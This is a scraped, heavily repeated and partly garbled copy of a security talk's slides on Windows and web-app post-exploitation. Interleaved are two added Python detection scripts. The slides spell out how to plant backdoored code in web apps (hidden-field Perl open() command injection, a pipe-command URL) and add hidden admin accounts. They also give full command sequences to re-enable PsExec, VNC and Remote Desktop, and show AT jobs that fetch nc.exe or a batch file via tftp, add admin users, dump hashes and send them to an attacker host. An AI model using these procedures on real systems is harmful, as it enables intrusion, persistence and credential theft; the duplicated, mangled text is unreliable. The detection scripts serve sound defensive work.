  – Beyond EIP – the theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 23: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 24: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not

• AT is as good as having a shell
– Enable / Start Services
– Transfer files
– Adding users
– Messing with the registry / policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow

• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now

– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
– Net use \\target
– Net time \\target
– At \\target (net time +1min) "tftp -i use GET e.bat"
– At \\target (net time +2min) e.bat
– e.bat does:

• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)

• Gets hashdumping tools and dumps hashes
• Sends hashes, identified by IP, back to attacker host
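
What this chain looks like from the host being checked, as an added example that is not the AtAbuse tool or any other code from the talk: a Python triage of a scheduler job list. The listing is constructed in the shape of `at` output, and the detection rules (file-transfer tools, account or group changes, service or registry changes, and a fetch followed within a few minutes by a job that runs the fetched file) are this example's own and need tuning to the environment.

```python
"""Triage a host's scheduler job list for the pattern described above: a job
that fetches a file, then a job a minute or two later that runs it, and job
commands that add accounts or reconfigure services.

Added example for this page, not the authors' AtAbuse tool. The listing below
is constructed in the shape of `at` output; the detection rules are this
example's own and should be tuned to the environment.
"""
import re
from dataclasses import dataclass

SAMPLE_AT_LISTING = """Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                   12:00 PM      tftp -i 10.0.0.9 GET e.bat
        2   Today                   12:01 PM      e.bat
        3   Each M T W Th F          2:00 AM      c:\\scripts\\nightly_backup.cmd
"""

# One job row: optional ERROR status, numeric id, day column, clock time, command.
JOB_LINE = re.compile(
    r"^\s*(?P<status>ERROR)?\s*(?P<id>\d+)\s+(?P<day>\S.*?)\s{2,}"
    r"(?P<time>\d{1,2}:\d{2} [AP]M)\s+(?P<cmd>\S.*?)\s*$")

# (label, pattern) pairs applied to each job's command line. Every AT job runs
# as SYSTEM, so any of these is worth a look even when it seems routine.
SUSPICIOUS = [
    ("file transfer tool in job command", re.compile(r"\b(tftp|ftp)\b", re.I)),
    ("account creation", re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("administrators group change",
     re.compile(r"\bnet\s+localgroup\b.*\badministrators\b.*\s/add\b", re.I)),
    ("service start-type change", re.compile(r"\bsc\b.*\bconfig\b.*\bstart=", re.I)),
    ("silent registry import", re.compile(r"\bregedit\b.*\s/s\b", re.I)),
    ("job command is a batch file", re.compile(r"^\S*\.bat\b", re.I)),
]
GET_FILE = re.compile(r"\bGET\s+(\S+)", re.I)


@dataclass
class Job:
    id: int
    day: str
    minute: int          # scheduled time of day, minutes since midnight
    cmd: str


def _minutes(clock):
    """'12:01 PM' -> 721; '2:00 AM' -> 120."""
    hhmm, ampm = clock.split()
    h, m = (int(x) for x in hhmm.split(":"))
    return (h % 12 + (12 if ampm == "PM" else 0)) * 60 + m


def parse_at_listing(text):
    """Parse the job rows of an `at` listing, skipping header and rule lines."""
    jobs = []
    for line in text.splitlines():
        m = JOB_LINE.match(line)
        if m:
            jobs.append(Job(int(m["id"]), m["day"], _minutes(m["time"]), m["cmd"]))
    return jobs


def triage(jobs, window=5):
    """Return findings for suspicious commands and for fetch-then-run chains
    (a GET of a file followed within `window` minutes by a job naming it)."""
    findings = []
    for job in jobs:
        for label, rx in SUSPICIOUS:
            if rx.search(job.cmd):
                findings.append(f"job {job.id}: {label}")
    for fetch in jobs:
        m = GET_FILE.search(fetch.cmd)
        if not m:
            continue
        name = m.group(1).rsplit("\\", 1)[-1].lower()
        for run in jobs:
            delta = run.minute - fetch.minute
            if run is not fetch and 0 <= delta <= window and name in run.cmd.lower():
                findings.append(f"job {fetch.id} fetches {name}; job {run.id} runs it {delta} min later")
    return findings


if __name__ == "__main__":
    for f in triage(parse_at_listing(SAMPLE_AT_LISTING)):
        print("FINDING:", f)
```

On the sample listing the nightly backup job produces nothing, the two one-minute-apart jobs produce a finding each, and the chain rule ties them together. The chain rule is the useful one: neither a tftp fetch nor a batch file is damning on its own, but a fetch followed within minutes by execution of the fetched file is exactly the flow described on the slides.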

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish netbios session / credentials on range of hosts

• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
– Beyond EIP – The theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
– Thanks to

• All the people from offensivecomputing, nologin, uninformed IRC and SILC channels

• HD Moore especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net


Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected

– Especially good in big apps
– Code review can't even be sure of maliciousness
– Some sites replace code every X time period

• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take concept to another level
– Add a decoder to web app
– Look for a "trigger" string combination in form fields
– If Name = John Smith and Age = 42 then execute contents of Address field
– URL encode form entries containing commands
– Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
– Further encoding
– Take entries from all fields
– Concat them
– "Decode" commands
– Rotational Ciphers (rot 13, caesar)
– Even more complex obfuscation
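
A review-side check for the decoder described in the last two slides, added here as an example and not part of the talk: URL-decode every field, join the values as the decoder would, and try every rotation of the alphabet, reporting the first one that exposes command-like text. The token list and the two submissions are constructed; the second submission's address field is rot13 of a tftp fetch like the ones in the talk's AT examples.

```python
"""Reviewer-side check for the form-field backdoor described above: URL-decode
every field, concatenate the values the way the slide's decoder would, try all
26 alphabet rotations (rot13 is shift 13), and report the first rotation that
exposes command-like text.

Added example for this page, not the authors' code. The token list and the two
submissions are constructed; the command hidden in the second one is rot13 of
a tftp fetch like the ones in the talk's AT examples.
"""
import re
import string
from urllib.parse import unquote_plus

# Tokens that should never appear in a name/age/address form, in any rotation.
COMMAND_TOKENS = re.compile(
    r"(cmd\.exe|/bin/sh|powershell|\bnet\s+(user|localgroup)\b|\btftp\b|\bwget\b|\bwhoami\b)",
    re.I)

# Constructed submissions, as they would arrive URL-encoded.
BENIGN = {"name": "Jane+Doe", "age": "35", "address": "12+Main+Street"}
SUSPECT = {"name": "John+Smith", "age": "42", "address": "gsgc+-v+10.0.0.9+TRG+ap.rkr"}


def rotate(text, shift):
    """Caesar-rotate ASCII letters by `shift`; digits and punctuation are kept."""
    out = []
    for c in text:
        if c in string.ascii_lowercase:
            out.append(chr((ord(c) - 97 + shift) % 26 + 97))
        elif c in string.ascii_uppercase:
            out.append(chr((ord(c) - 65 + shift) % 26 + 65))
        else:
            out.append(c)
    return "".join(out)


def concatenated_fields(form):
    """Decode each field and join them, mirroring what the backdoor's decoder sees."""
    return " ".join(unquote_plus(v) for v in form.values())


def inspect_submission(form):
    """Return (shift, token) for the first rotation exposing a command token, else None."""
    blob = concatenated_fields(form)
    for shift in range(26):
        m = COMMAND_TOKENS.search(rotate(blob, shift))
        if m:
            return shift, m.group(0)
    return None


if __name__ == "__main__":
    for label, form in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_submission(form))
```

The check does not need to know the trigger combination, which is application-specific; it only needs the observation from the slide that a rotational cipher has 25 usable keys, so brute-forcing every rotation of the joined fields costs nothing. The same loop is what a code reviewer should run on any "decoder" found in a web application's form handling.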

Slide 28

Persistence

• Covert Accounts
– Add an account / re-enable one
– Modify local account policies to allow access

• Ex: SUPPORT_3848576b1, guest
– Add it to the admin group (net localgroup)

• Only use AT to run your commands
• Persistence without adding files / new accounts

– Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

• Hiding your activity
– From:

• IDS
• AV
• LOGGING
• Suspicious users & admins
• Firewalls
• Process listing

Slide 32

Stealth Evading Detection

• Why Stealth?
– If you get caught, you get stopped
– The longer you can operate undetected, the more you can accomplish
– Admins won't fix problems they don't know exist (helps persistence)
– On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth Evading Detection

• Goals
– Keep system operable

• If it breaks you can't use it
• Someone will come fix it

– Operate without fear of detection
– Robustness

• Hiding shouldn't require constant attention
– DON'T LOOK MALICIOUS

Slide 34

Stealth Evading Detection

• Manual / Existing Tools
– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption

• Shellcode Encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels / Steganography
